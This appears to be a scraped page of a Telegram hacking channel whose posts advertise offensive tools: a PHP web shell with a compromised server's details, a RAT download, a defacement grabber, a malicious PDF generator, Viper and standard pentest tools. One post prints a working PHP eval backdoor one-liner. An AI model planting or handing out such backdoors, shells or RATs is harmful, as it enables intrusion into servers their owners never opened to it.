BugCod3
7.26K subscribers
334 photos
6 videos
7 files
443 links
[ BugCod3 ] β€” From Shadows To Shells ⚑️

πŸ•Ά Hacking | 🐞 Bug Bounty | πŸ” Security Tools
βš”οΈ Learn β€’ Hunt β€’ Dominate

πŸ‘₯ Group: T.me/BugCod3GP
πŸ“‚ Topic: T.me/BugCod3Topic

🌐 Web: BugCod3.com
πŸ€– Contact: T.me/BugCod3BOT
πŸ“§ Email: BugCod3@protonmail.com
Download Telegram
PHP: 7.4.33.2

Safe Mode: OFF

ServerIP: 10.7.46.244

HDD: Total:45356.01 GB
Free:? B [0%]

useful:--------------

Downloader: --------------

Disable Functions: exec | passthru | popen | proc_open | shell_exec | system | Show All (53)


CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : OFF

SoftWare: Flywheel/5.0.0

πŸ”— Link

Enjoy... ⭐️

#Shell
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑2❀1😒1
RedTeam-Tools

This github repository contains a collection of 125+ tools and resources that can be useful for red teaming activities.

Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.

GitHub

BlueTeam-Tools

#RedTeam
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
❀‍πŸ”₯3⚑1
Brave Browser

The new Brave browser blocks ads and trackers that slow you down and invade your privacy. Discover a new way of thinking about how the web can work.

Download
GitHub

#Brave #Browser
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
🫑5
Kubernetes Goat

✨ The Kubernetes Goat is designed to be an intentionally vulnerable cluster environment to learn and practice Kubernetes security πŸš€

πŸ† Scenarios
Sensitive keys in codebases
DIND (docker-in-docker) exploitation
SSRF in the Kubernetes (K8S) world
Container escape to the host system
Docker CIS benchmarks analysis
Kubernetes CIS benchmarks analysis
Attacking private registry
NodePort exposed services
Helm v2 tiller to PwN the cluster - [Deprecated]
Analyzing crypto miner container
MORE+++

GitHub

#RedTeam #Security #Vuln_App
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
πŸ”₯1
Malicious PDF Generator ☠️

Generate ten different malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh

Usage

β”Œβ”€β”€(BugCod3γ‰Ώkali)-[~]
└─$
python3 malicious-pdf.py burp-collaborator-url

Output will be written as: test1.pdf, test2.pdf, test3.pdf etc in the current directory.

Purpose

βšͺ️ Test web pages/services accepting PDF-files
βšͺ️ Test security products
βšͺ️ Test PDF readers
βšͺ️ Test PDF converters

GitHub

#RedTeam #PDF #Pentesting
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
πŸ”₯4
VIPER

βšͺ️ Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
βšͺ️ Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
βšͺ️ Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories
βšͺ️ Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce technical threshold
βšͺ️ Viper supports running native msfconsole in browser and multi - person collaboration

Site
Installation manual
GitHub

#RedTeam #Viper #Post_Exploitation
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
❀1🫑1
WinPwn

To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration.
The script is mostly based on well-known large other offensive security Powershell projects.

GitHub

#RedTeam #PowerShell #Pentesting
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
πŸ”₯1
Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner

Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Features

Efficient:
More than 20 plugins to automate privilege-escalation tasks

Stealth: The framework is made by paranoids, for paranoids

Convenient: A robust interface with many crucial features

Supported platforms (as attacker):

GNU/Linux
Mac OS X

Supported platforms (as target):

GNU/Linux
BSD-like
Mac OS X
Windows NT

GitHub

#RedTeam #Web_Hacking #HackTool
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
🀯1
Grabber Zone-H

Download

#Grabber #ZoneH
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
🀯1
Snoop Project

Snoop Project One of the most promising OSINT tools to search for nicknames

This is the most powerful software taking into account the CIS location.

Is your life slideshow? Ask Snoop.
Snoop project is developed without taking into account the opinions of the NSA and their friends,
that is, it is available to the average user

GNU/Linux βœ…
Windows 7/10 (32/64) βœ…
Android (Termux) βœ…
macOS ❗️
IOS 🚫
WSL 🚫


GitHub
Download

#RedTeam #Scanner #Osint #Username_Search
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
❀1πŸ‘1πŸ”₯1😒1
CobaltStrike support

Support CobaltStrike's security assessment of other platforms (Linux/MacOS/...), and include the development support of Unix post-penetration module

GitHub

#RedTeam #Cobalt_Strike #Cross_Platform
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑2❀1
This media is not supported in your browser
VIEW IN TELEGRAM
pwndrop

pwndrop is a self-deployable file hosting service for sending out red teaming payloads or securely sharing your private files over HTTP and WebDAV.

If you've ever needed to quickly set up an nginx/apache web server to host your files and you were never happy with the limitations of python -m SimpleHTTPServer, pwndrop is definitely for you!

GitHub

#RedTeam #Self_Hosted #file_sharing
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑1πŸ‘1
888 Rat

Download

#Rat #Windows #Android
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
😒1
Awesome-Bugbounty-Writeups

A list of writeups in the field of Bug Bunty

GitHub

#Writeup
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
πŸ‘2⚑1
Penetration-Testing-Tools

A collection of my Penetration Testing Tools, Scripts, Cheatsheets

This is a collection of more than a 160+ tools, scripts, cheatsheets and other loots that I've been developing over years for Penetration Testing and IT Security audits purposes. Most of them came handy at least once during my real-world engagements.

Notice: In order to clone this repository properly - use
--recurse-submodules
switch:
git clone --recurse https://github.com/mgeeky/Penetration-Testing-Tools.git

GitHub

#RedTeam #Pentesting #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑1
ffuf - Fuzz Faster U Fool
A fast web fuzzer written in Go.

Installation
Download a prebuilt binary from releases page, unpack and run!

or

If you are on macOS with homebrew, ffuf can be installed with:
brew install ffuf

or

If you have recent go compiler installed:
go install github.com/ffuf/ffuf/v2@latest
(the same command works for updating)

or

git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go build

Ffuf depends on Go 1.16 or greater.

GitHub

#Web #InfoSec #Fuzzer
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑2
Commix (short for [comm]and [i]njection e[x]ploiter) is an open source penetration testing tool, written by Anastasios Stasinopoulos (@ancst), that automates the detection and exploitation of command injection vulnerabilities.

Installation
You can download commix on any platform by cloning the official Git repository :
$ git clone https://github.com/commixproject/commix.git commix

Alternatively, you can download the latest tarball or zipball.

Note: Python (version 2.6, 2.7 or 3.x) is required for running commix.

Usage
To get a list of all options and switches use:
$ python commix.py -h

To get an overview of commix available options, switches and/or basic ideas on how to use commix, check usage, usage examples and filters bypasses wiki pages.

GitHub

#RedTeam #BugBounty #Command_Injection #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑1
Dork Scraper
Scrape website URLs using Google Dorks.

GitHub

#RedTeam #Dork #Scraper #Google
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
πŸ‘3
Gobuster

Gobuster is a tool used to brute-force:

βšͺ️ URIs (directories and files) in web sites.
βšͺ️ DNS subdomains (with wildcard support).
βšͺ️ Virtual Host names on target web servers.
βšͺ️ Open Amazon S3 buckets
βšͺ️ Open Google Cloud buckets
βšͺ️ TFTP servers

GitHub

⬇️ Download
πŸ”’ BugCod3

#Go #Dns #Web #Pentesting #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
πŸ‘3